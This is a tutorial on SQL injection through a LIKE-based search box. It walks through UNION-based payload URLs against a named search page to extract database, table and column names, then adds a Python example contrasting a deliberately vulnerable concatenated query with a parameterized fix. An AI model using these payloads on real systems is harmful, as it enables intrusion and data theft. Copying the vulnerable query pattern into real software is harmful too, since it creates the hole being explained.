Search-type injection
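The principle relies on a fuzzy (LIKE) query:
select * from users where username like '%a%'
1. Find an injection point in a search box that is backed by a fuzzy query.
2. Construct the closure.
Because the fuzzy-query code is
select * from users where username like '%a%'
the input should be
鱼%' -- s
Check whether the constructed closure is correct:
鱼%' and 1=1 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=1 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=2 -- s
This proves that the closure succeeded.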
3. Determine the number of columns.
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 10 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 5 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 7 -- s
http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 8 -- s
So the number of columns is 7.
4. Use a UNION query to find the echo positions.
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,2,3,4,5,6,7 -- s
So the echo positions are 2 and 6.
5. Query the database name.
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,6,7 -- s
6. Query the table names.
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema='food_db' -- s
7. Query the column names.
http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema='food_db' and table_name='collection' -- s
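Why the closure in step 2 works, and the fix, as an added example that is not code from the original page: the same LIKE search built by string concatenation and with a bound parameter plus wildcard escaping. It uses Python's sqlite3 as a stand-in for the page's PHP/MySQL backend; the `food` table, its rows and all function names are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE food (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO food VALUES (?, ?)",
                   [(1, "鱼香肉丝"), (2, "水煮鱼"), (3, "100% beef"), (4, "salad")])
    return db

def search_vulnerable(db, keyword):
    # The keyword is concatenated into the SQL text, so a quote in it ends
    # the string literal and everything after it is parsed as SQL.
    sql = "SELECT id, name FROM food WHERE name LIKE '%" + keyword + "%'"
    return db.execute(sql).fetchall()

def escape_like(keyword, esc="\\"):
    # Make the escape character, % and _ literal inside a LIKE pattern.
    for ch in (esc, "%", "_"):
        keyword = keyword.replace(ch, esc + ch)
    return keyword

def search_safe(db, keyword):
    # The pattern travels as a bound parameter: it is data, never SQL text.
    pattern = "%" + escape_like(keyword) + "%"
    sql = "SELECT id, name FROM food WHERE name LIKE ? ESCAPE '\\'"
    return db.execute(sql, (pattern,)).fetchall()

def probe_changes_result(search, db):
    # The page's 1=1 / 1=2 pair, usable as a regression test on your own
    # query code: differing results mean the input reached the SQL parser.
    always_true = search(db, "鱼%' and 1=1 -- s")
    always_false = search(db, "鱼%' and 1=2 -- s")
    return always_true != always_false

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe_changes_result(search_vulnerable, db))
    print("parameterized:", probe_changes_result(search_safe, db))
    print("literal % search:", search_safe(db, "%"))
```

Binding alone stops the injection; the `ESCAPE` clause additionally keeps a user-supplied `%` or `_` from acting as a wildcard and matching every row.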